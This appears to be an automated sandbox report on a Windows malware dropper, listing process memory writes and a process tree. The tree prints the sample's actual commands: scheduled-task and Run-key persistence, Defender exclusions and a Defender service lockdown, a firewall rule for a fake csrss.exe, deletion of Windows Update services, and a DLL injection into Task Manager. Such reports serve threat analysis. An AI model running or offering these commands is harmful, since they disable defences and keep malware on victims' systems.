description pid Process procid_target PID 4440 wrote to memory of 612 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 66 PID 4440 wrote to memory of 612 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 66 PID 4440 wrote to memory of 828 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 67 PID 4440 wrote to memory of 828 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 67 PID 4440 wrote to memory of 828 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 67 PID 4440 wrote to memory of 3636 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 68 PID 4440 wrote to memory of 3636 4440 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 68 PID 828 wrote to memory of 3908 828 oldplayer.exe 69 PID 828 wrote to memory of 3908 828 oldplayer.exe 69 PID 828 wrote to memory of 3908 828 oldplayer.exe 69 PID 3908 wrote to memory of 3568 3908 oneetx.exe 70 PID 3908 wrote to memory of 3568 3908 oneetx.exe 70 PID 3908 wrote to memory of 3568 3908 oneetx.exe 70 PID 3908 wrote to memory of 4776 3908 oneetx.exe 71 PID 3908 wrote to memory of 4776 3908 oneetx.exe 71 PID 3908 wrote to memory of 4776 3908 oneetx.exe 71 PID 4776 wrote to memory of 4720 4776 cmd.exe 74 PID 4776 wrote to memory of 4720 4776 cmd.exe 74 PID 4776 wrote to memory of 4720 4776 cmd.exe 74 PID 4776 wrote to memory of 4732 4776 cmd.exe 75 PID 4776 wrote to memory of 4732 4776 cmd.exe 75 PID 4776 wrote to memory of 4732 4776 cmd.exe 75 PID 4776 wrote to memory of 2684 4776 cmd.exe 76 PID 4776 wrote to memory of 2684 4776 cmd.exe 76 PID 4776 wrote to memory of 2684 4776 cmd.exe 76 PID 4776 wrote to memory of 1588 4776 cmd.exe 77 PID 4776 wrote to memory of 1588 4776 cmd.exe 77 PID 4776 wrote to memory of 1588 4776 cmd.exe 77 PID 4776 wrote to memory of 3540 4776 cmd.exe 78 PID 4776 wrote to memory of 3540 4776 cmd.exe 78 PID 4776 wrote to memory of 3540 4776 cmd.exe 78 PID 4776 wrote to memory of 1112 4776 cmd.exe 79 PID 4776 wrote to memory of 1112 4776 cmd.exe 79 PID 4776 wrote to memory of 1112 4776 cmd.exe 79 PID 3908 wrote to memory of 4888 3908 oneetx.exe 80 PID 3908 wrote to memory of 4888 3908 oneetx.exe 80 PID 3908 wrote to memory of 4888 3908 oneetx.exe 80 PID 3908 wrote to memory of 1384 3908 oneetx.exe 81 PID 3908 wrote to memory of 1384 3908 oneetx.exe 81 PID 3908 wrote to memory of 1384 3908 oneetx.exe 81 PID 3908 wrote to memory of 4612 3908 oneetx.exe 84 PID 3908 wrote to memory of 4612 3908 oneetx.exe 84 PID 3908 wrote to memory of 4828 3908 oneetx.exe 85 PID 3908 wrote to memory of 4828 3908 oneetx.exe 85 PID 3908 wrote to memory of 4828 3908 oneetx.exe 85 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 4828 wrote to memory of 4852 4828 toolspub2.exe 87 PID 3908 wrote to memory of 4308 3908 oneetx.exe 88 PID 3908 wrote to memory of 4308 3908 oneetx.exe 88 PID 3908 wrote to memory of 4308 3908 oneetx.exe 88 PID 3908 wrote to memory of 3316 3908 oneetx.exe 92 PID 3908 wrote to memory of 3316 3908 oneetx.exe 92 PID 3908 wrote to memory of 1472 3908 oneetx.exe 95 PID 3908 wrote to memory of 1472 3908 oneetx.exe 95 PID 3908 wrote to memory of 1472 3908 oneetx.exe 95 PID 3908 wrote to memory of 720 3908 oneetx.exe 96 PID 3908 wrote to memory of 720 3908 oneetx.exe 96 PID 3908 wrote to memory of 720 3908 oneetx.exe 96 PID 3908 wrote to memory of 1620 3908 oneetx.exe 98 PID 3908 wrote to memory of 1620 3908 oneetx.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe"C:\Users\Admin\AppData\Local\Temp\2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Users\Admin\AppData\Local\Temp\aafg31.exe"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"3⤵
- Executes dropped EXE
PID:612
-
-
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F5⤵
- Creates scheduled task(s)
PID:3568
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:4720
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"6⤵PID:4732
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E6⤵PID:2684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:1588
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"6⤵PID:3540
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E6⤵PID:1112
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"5⤵
- Executes dropped EXE
PID:4888 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 6566⤵
- Program crash
PID:448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 9246⤵
- Program crash
PID:3232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 9846⤵
- Program crash
PID:4296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 10046⤵
- Program crash
PID:5052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 10166⤵
- Program crash
PID:4284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 10446⤵
- Program crash
PID:424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 12686⤵
- Program crash
PID:1596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 12806⤵
- Program crash
PID:4344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 14246⤵
- Program crash
PID:3424
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit6⤵PID:672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1384 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4852
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3316
-
-
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"5⤵
- Executes dropped EXE
PID:1472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"6⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4496
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:4140
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:3948
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2188
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2680 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4976
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe7⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:4900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4700
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:1656
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵PID:4872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:1332
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1300
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵
- Executes dropped EXE
PID:3320
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:5068
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵
- Executes dropped EXE
PID:3824 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:1084
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
- Launches sc.exe
PID:4164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe8⤵
- Executes dropped EXE
PID:3400 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:2664
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "csrss" /f9⤵PID:3264
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f9⤵PID:4256
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"5⤵
- Executes dropped EXE
PID:720 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:2244
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:4556
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:1620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:3636
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵PID:3208
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4264
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3928
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4256
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3320
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1020
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:164
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4736
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4976
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:984
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2688
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3560
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4124
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4328
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3640
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4896
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4876
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3372
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3360
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4736
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1416
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:616
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2500
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:716
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:640
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4252
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1588
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:4912
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:4976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵PID:1440
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:3820
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4556
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5092
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4896
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4812
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4072
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4248
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2056
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4164
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:608
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2532
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4076
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:164
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2396
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:4288
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:644
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4252
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4764
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4916
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:720
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3852
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:4316
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:5088
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2824
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4352
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4256
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:2708
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4932
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1300
-
-
